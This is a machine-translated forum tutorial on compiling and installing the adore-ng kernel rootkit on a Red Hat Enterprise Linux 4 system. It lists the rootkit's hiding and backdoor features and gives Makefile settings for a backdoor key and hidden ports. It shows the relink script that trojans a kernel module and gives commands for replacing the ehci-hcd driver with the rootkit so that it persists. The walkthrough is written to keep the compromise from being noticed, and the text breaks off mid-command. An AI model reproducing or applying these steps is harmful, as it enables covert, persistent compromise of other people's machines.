Author: baoz
I wrote an article long ago and transferred it back. It's strange. At that time, I tested to hide the port, but now I can't hide the port, and the answer will come soon :)
The reason is found. The problem is still original. If you encounter similar problems, use the original version. If you want to know where the problem is, use diff on your own.
Preface:
Kernel 2.6 has stride into the linux World, and backdoor writing and webshell writing must also keep up with the trend.
Shorthand Convention:
Fc: fedora core
Rh: red hat
Rhel4: red hat enterprise linux 4
Sk: suckit
Adore: adore-ng
Rk: rootkit
Lkm: loadable kernel modules
What is adore-ng?
Google adore will provide a lot of details about an LKM rk.
Why choose him?
1. I didn't get sk for 2.6
2. kmem is disabled by default for rh kernel after fc2, sk cannot inject the kernel on the fly, and many programs that check rk also fail :)
3. adore is written by Daniel Stealth and has a long history. There are more than N people to help him test. It should be more stable than other LKM, and the stability of LKM will seriously affect the system stability, therefore, we must be cautious when selecting a model. Even if the function is good, the system will be suspended after a bit of play and the system will be discovered by others.
Function:
[Root @ RHEL4 adore-ng] # cat FEATURES
If you never used adore before, here's a list of supported
Things:
O runs on kernel 2.4.x UP and SMP systems
O runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
O file and directory hiding
O process hiding
O socket-hiding (no matter whether LISTENing, CONNECTED etc)
O full-capability back door
O does not utilize sys_call_table but VFS layer
O KISS principle, to have as less things in there as possible
But also being as much powerful as possible
O hides itself from/proc and/sys filesystems
O syslog filtering: logs generated by hidden processes never appear
On the syslog UNIX socket anymore
O wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
Do not appear in the file, cannot you force it by using special hidden
AND authenticated process (a sshd back door is usually only hidden thus
Xtmp entries written by sshd don't make it to disk)
O (optional) relinking of LKMs as described in phrack #61 aka LKM infection
To make it possible to be automatically reloaded after reboots (2.4 and 2.6)
Environment:
Real machine non-Virtual Machine
[Root @ RHEL4 adore-ng] # uname-a; cat/etc/redhat-release
Linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux
Red Hat Enterprise linux AS release 4 (Nahant)
Download:
Google adore-ng
Or you can look for it in the http://baoz.net of the website.
Edit and compile:
[Root @ RHEL4 adore-ng] # mv Makefile.2.6 Makefile
Edit the following content.
EXTRA_CFLAGS =-DELITE_UID = 2618748389U-DELITE_GID = 4063569279U
EXTRA_CFLAGS + =-DCURRENT_ADORE = 54
EXTRA_CFLAGS + =-DADORE_KEY = "fgjgggfd"
This is a hidden TCP port. Do not change the last 0.
U_short HIDDEN_SERVICES [] =
{2222,735 0, 0 };
If you are an SMP machine, open the following.
EXTRA_CFLAGS + =-d1_smp __
Set the location of your kernel code
KERNEL_SOURCE =/usr/src/linux
OK, save and exit, make
[Root @ RHEL4 adore-ng] # make
Cc-DELITE_UID = 2634745389u-DELITE_GID = 6063589279U-DCURRENT_ADORE = 54-DADORE_KEY = "djksdfnvn"-DHIDE ava. c libinvisible. c-o ava
Ava. c: 47: warning: integer constant is too large for "unsigned long" type
Ava. c: 47: warning: large integer implicitly truncated to unsigned type
Libinvisible. c: In function 'adore _ hidefile ':
Libinvisible. c: 76: warning: integer constant is too large for "unsigned long" type
Libinvisible. c: 76: warning: large integer implicitly truncated to unsigned type
Make-C/usr/src/linux SUBDIRS = 'pwd' modules
Make [1]: Entering directory '/usr/src/kernels/2.6.9-5. EL-i686 ′
CC [M]/root/adore-ng/adore-ng-2.6.o
/Root/adore-ng/adore-ng-2.6.c: 56: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: 59: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: 61: warning: 'module _ PARM _ 'is deprecated (declared at include/linux/MODULE. h: 552)
/Root/adore-ng/adore-ng-2.6.c: In function 'adore _ opt_filldir ':
/Root/adore-ng/adore-ng-2.6.c: 281: warning: integer constant is too large for "unsigned long" type
/Root/adore-ng/adore-ng-2.6.c: 281: warning: comparison is always false due to limited range of data type
/Root/adore-ng/adore-ng-2.6.c: In function 'adore _ root_filldir ':
/Root/adore-ng/adore-ng-2.6.c: 363: warning: integer constant is too large for "unsigned long" type
/Root/adore-ng/adore-ng-2.6.c: 363: warning: comparison is always false due to limited range of data type
Building modules, stage 2.
MODPOST
CC/root/adore-ng/adore-ng-2.6.mod.o
LD [M]/root/adore-ng/adore-ng-2.6.ko
Make [1]: Leaving directory '/usr/src/kernels/2.6.9-5. EL-i686 ′
Cc-O2 symsed. c-o symsed
Let's talk about his relink, which is the function of inserting adore into other modules. Let's see what he has done.
System ("cp $ lkm_path t. ko ");
System ("./symsed t. ko zero; ld-r adore-ng-2.6.ko t. ko-o z. ko; rm-f t. ko ");
Print "nCopy trojaned LKM back to original LKM? (Y/n) n ";
While ($ yn !~ /^ (Y | n) $/I ){
$ Yn = <STDIN>;
$ Yn = ~ S/n //;
}
If ($ yn = ~ /Y/I ){
System ("cp z. ko $ lkm_path ");
} Else {
Print "nOutput LKM is z. kon ";
}
After I insert a module in RHEL4, the module cannot be started, but it doesn't matter. We don't insert it, we replace it :)
Only a few people install modprobe-r after the system, so we can easily replace some modules that the system does not need very much. Let's look at my modules.
[Root @ RHEL4 adore-ng] # lsmod
Module Size Used
Dm_mod 54741 0
Ohci_hcd 21713 0
Snd_intel8 × 0 33769 0
Snd_ac97_codec 63889 1 snd_intel8 × 0
Snd_pcm_oss 49017 0
Snd_mixer_oss 17985 1 snd_pcm_oss
Snd_pcm 96841 2 snd_intel8 × 0, snd_pcm_oss
Snd_timer 29893 1 snd_pcm
Snd_page_alloc 9673 2 snd_intel8 × 0, snd_pcm
Snd_mpu401_uart 8769 1 snd_intel8 x 0
Snd_rawmidi 26597 1 snd_mpu401_uart
Snd_seq_device 8137 1 snd_rawmidi
Snd 54949 9
Snd_intel8 × 0, snd_ac97_codec, snd_pcm_oss, snd_mixer_oss, snd_pcm, snd_timer, snd_mpu401_uart, snd_rawmidi, snd_seq_device
Soundcore 9889 1 snd
Sis90018756 0
Ext3 116809 1
Jbd 71257 1 ext3
We chose a module with Used By 0 which is not very useful, such as a usb driver.
I have used ehci_hcd, so I cannot see it here. We can also use ohci_hcd or the sound card module.
See where he is.
[Root @ RHEL4 adore-ng] # modprobe-l | grep ehci
/Lib/modules/2.6.9-5.EL/ kernel/drivers/usb/host/ehci-hcd.ko
Unload him
[Root @ RHEL4 adore-ng] # modprobe-r ehci-hcd
Replace him
[Root @ RHEL4 adore-ng] # cp adore-ng-2.6.ko/lib/modules/2.6.9-5.EL/ kernel/drivers/usb/host/ehci-hcd.ko
Load him
[Root @ RHEL4 adore-ng] # modprob